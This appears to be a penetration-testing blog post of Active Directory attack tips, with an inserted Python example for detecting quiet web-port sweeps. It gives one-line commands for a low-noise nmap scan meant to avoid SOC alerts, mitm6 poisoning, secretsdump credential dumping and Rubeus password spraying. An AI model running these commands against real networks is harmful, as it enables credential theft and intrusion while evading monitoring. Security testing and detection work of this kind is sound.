Mar 30, 2022
Welcome to another fun tale of pentest pwnage! This one isn't a telling of one single pentest, but a collection of helpful tips and tricks I've been using on a bunch of different tests lately. These tips include:
- I'm seeing nmap scans get flagged a bit more by managed SOC services. Maybe a "quieter" nmap scan will help get enough ports to do a WitnessMe run, but still fly under the logging/alerting radar? Something like: `nmap -p80,443,8000,8080 subnet.i.wanna.scan/24 -oA outputfile`
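From the blue-team side, the flip side of that tip is worth seeing in code: a sweep that only probes four web ports is small per host, but one source still touches many distinct destinations on the same few ports inside a short window. The following is an added example, not code from the original post or from 7MS; the connection-log format (`<ISO timestamp> <src> <dst> <dport>`) and the sample records are constructed for the example, and the thresholds are assumptions you would tune to your own network.

```python
"""Spot a "quiet" web-port sweep in connection logs.

Added example, not code from the original post. A scan limited to
80/443/8000/8080 across a /24 is small per host, but the source still
contacts many distinct destinations on the same few ports within a short
window, which is the signal a SOC can alert on. The log format below is
constructed for this example: "<ISO timestamp> <src> <dst> <dport>".
"""
from collections import defaultdict
from datetime import datetime, timedelta

# Ports a low-profile web sweep would probe (matches the nmap -p list above).
WATCHED_PORTS = {80, 443, 8000, 8080}

# Constructed sample connection log. 10.0.5.23 walks ten hosts on web ports in
# under a minute; 10.0.5.40 is ordinary traffic to a couple of servers.
SAMPLE_LOG = """\
2022-03-30T10:00:01 10.0.5.23 10.0.9.1 80
2022-03-30T10:00:07 10.0.5.23 10.0.9.2 80
2022-03-30T10:00:13 10.0.5.23 10.0.9.3 443
2022-03-30T10:00:19 10.0.5.23 10.0.9.4 80
2022-03-30T10:00:25 10.0.5.23 10.0.9.5 8080
2022-03-30T10:00:31 10.0.5.23 10.0.9.6 80
2022-03-30T10:00:37 10.0.5.23 10.0.9.7 8000
2022-03-30T10:00:43 10.0.5.23 10.0.9.8 80
2022-03-30T10:00:49 10.0.5.23 10.0.9.9 443
2022-03-30T10:00:55 10.0.5.23 10.0.9.10 80
2022-03-30T10:00:10 10.0.5.40 10.0.9.1 443
2022-03-30T10:00:40 10.0.5.40 10.0.9.1 443
2022-03-30T10:01:05 10.0.5.40 10.0.9.2 22
2022-03-30T10:02:00 10.0.5.40 10.0.9.11 80
"""


def parse_connections(text):
    """Turn log text into (timestamp, src, dst, dport) tuples."""
    records = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, src, dst, port = line.split()
        records.append((datetime.fromisoformat(ts), src, dst, int(port)))
    return records


def find_sweeps(records, min_targets=8, window=timedelta(minutes=5)):
    """Return {src: distinct_targets} for sources that reached at least
    min_targets distinct destinations on WATCHED_PORTS inside any `window`.
    Thresholds are assumptions for this example; tune them per network."""
    by_src = defaultdict(list)
    for ts, src, dst, port in records:
        if port in WATCHED_PORTS:
            by_src[src].append((ts, dst))
    alerts = {}
    for src, events in by_src.items():
        events.sort()  # chronological order for the sliding window
        start = 0
        for end in range(len(events)):
            # Advance the window start until the span is at most `window` long.
            while events[end][0] - events[start][0] > window:
                start += 1
            targets = {dst for _, dst in events[start:end + 1]}
            if len(targets) >= min_targets:
                alerts[src] = max(alerts.get(src, 0), len(targets))
    return alerts


if __name__ == "__main__":
    for src, count in find_sweeps(parse_connections(SAMPLE_LOG)).items():
        print(f"possible web-port sweep from {src}: {count} distinct hosts")
```

The design choice worth noting: the rule keys on distinct destinations per source rather than on total connections, so a busy but legitimate client that hammers one or two servers does not trip it, while a sweep that sends a single SYN per host does.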
- Using mitm6 in "sniper" mode by targeting just one host with: `mitm6 victim-I-want-to-get-juicy-info-from -d victim.domain --ignore-nofqdn`
- Using secretsdump to target a single host: `secretsdump.py -target-ip 1.2.3.4 localadmin:@1.2.3.4 -hashes THIS-IS-WHERE-THE:SAM-HASHES-GO`. Note the colon after localadmin - it's intentional, NOT an error! It separates the username from an empty password, since the credential is supplied through `-hashes`.
- Rubeus makes password spraying easy-peasy! `Rubeus.exe spray /password:Winter2022 /outfile:output.txt`. Get some hits from that effort? Then spray the good password against ALL domain accounts and you might get even more gold!
- LDAPS relaying not working? Make sure it's config'd right: `nmap -p636 -sV -iL txt-file-with-dcs-in-it`